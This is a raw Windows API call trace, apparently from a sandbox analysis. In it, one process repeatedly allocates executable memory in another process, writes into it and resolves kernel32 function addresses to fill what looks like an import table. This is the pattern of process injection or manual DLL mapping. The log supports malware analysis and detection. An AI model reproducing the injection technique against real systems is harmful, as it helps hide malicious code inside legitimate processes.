	[0153.782] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.782] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.782] lstrlenA (lpString="HeapFree") returned 8
	[0153.782] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.782] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0286*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0286*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0153.783] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.783] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.783] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.783] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.783] ResetEvent (hEvent=0x268) returned 1
	[0153.783] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.784] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.784] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.784] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.784] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.784] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004028, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.784] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.784] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.784] lstrlenA (lpString="GetProcessHeap") returned 14
	[0153.785] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.785] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0274*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0274*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0153.785] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.785] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.785] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.785] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.785] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.786] ResetEvent (hEvent=0x268) returned 1
	[0153.786] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.786] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.786] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.786] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.786] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.786] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000402c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.787] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.787] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.787] lstrlenA (lpString="HeapReAlloc") returned 11
	[0153.787] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.787] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0266*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0266*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0153.787] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.787] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.787] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.788] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.788] ResetEvent (hEvent=0x268) returned 1
	[0153.788] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.788] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.788] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.788] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.788] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.788] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004030, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.789] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.789] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.789] lstrlenA (lpString="HeapAlloc") returned 9
	[0153.789] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.789] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d025a*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d025a*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0153.789] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.790] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.790] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.790] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.790] ResetEvent (hEvent=0x268) returned 1
	[0153.790] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.790] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.790] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.791] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.791] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.791] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004034, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.791] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.791] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.791] lstrlenA (lpString="lstrlenW") returned 8
	[0153.791] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.791] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d02c8*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d02c8*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0153.792] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.792] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.792] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.792] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.792] ResetEvent (hEvent=0x268) returned 1
	[0153.792] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.793] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.793] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.793] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.793] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004038, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.793] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.793] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.793] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0153.793] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.794] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0246*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0246*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.794] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.794] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.794] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.794] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.795] ResetEvent (hEvent=0x268) returned 1
	[0153.795] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.795] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.795] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.795] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.795] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.795] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000403c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.795] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.796] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.796] lstrlenA (lpString="UnhandledExceptionFilter") returned 24
	[0153.796] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.796] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d05a4*, nSize=0x19, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d05a4*, lpNumberOfBytesWritten=0x12857c*=0x19) returned 1
	[0153.796] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.796] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.796] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.797] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.797] ResetEvent (hEvent=0x268) returned 1
	[0153.797] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.797] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.797] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.797] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.797] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.797] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004040, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.798] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.798] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.798] lstrlenA (lpString="GetCurrentProcess") returned 17
	[0153.798] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.798] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0590*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0590*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0153.798] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.798] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.798] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.799] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.799] ResetEvent (hEvent=0x268) returned 1
	[0153.799] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.799] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.799] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.799] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.799] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.799] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004044, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.800] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.800] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.800] lstrlenA (lpString="TerminateProcess") returned 16
	[0153.800] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.800] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d057c*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d057c*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.800] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.801] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.801] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.801] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.801] ResetEvent (hEvent=0x268) returned 1
	[0153.801] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.802] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.802] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.802] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.802] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.802] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004048, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.803] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.803] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23
	[0153.803] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.803] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0562*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0562*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0153.803] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.803] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.803] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.804] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.804] ResetEvent (hEvent=0x268) returned 1
	[0153.804] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.804] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.804] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.804] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.804] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.804] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000404c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.805] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.805] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.805] lstrlenA (lpString="GetCurrentProcessId") returned 19
	[0153.805] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.805] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d054c*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d054c*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0153.805] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.805] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.805] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
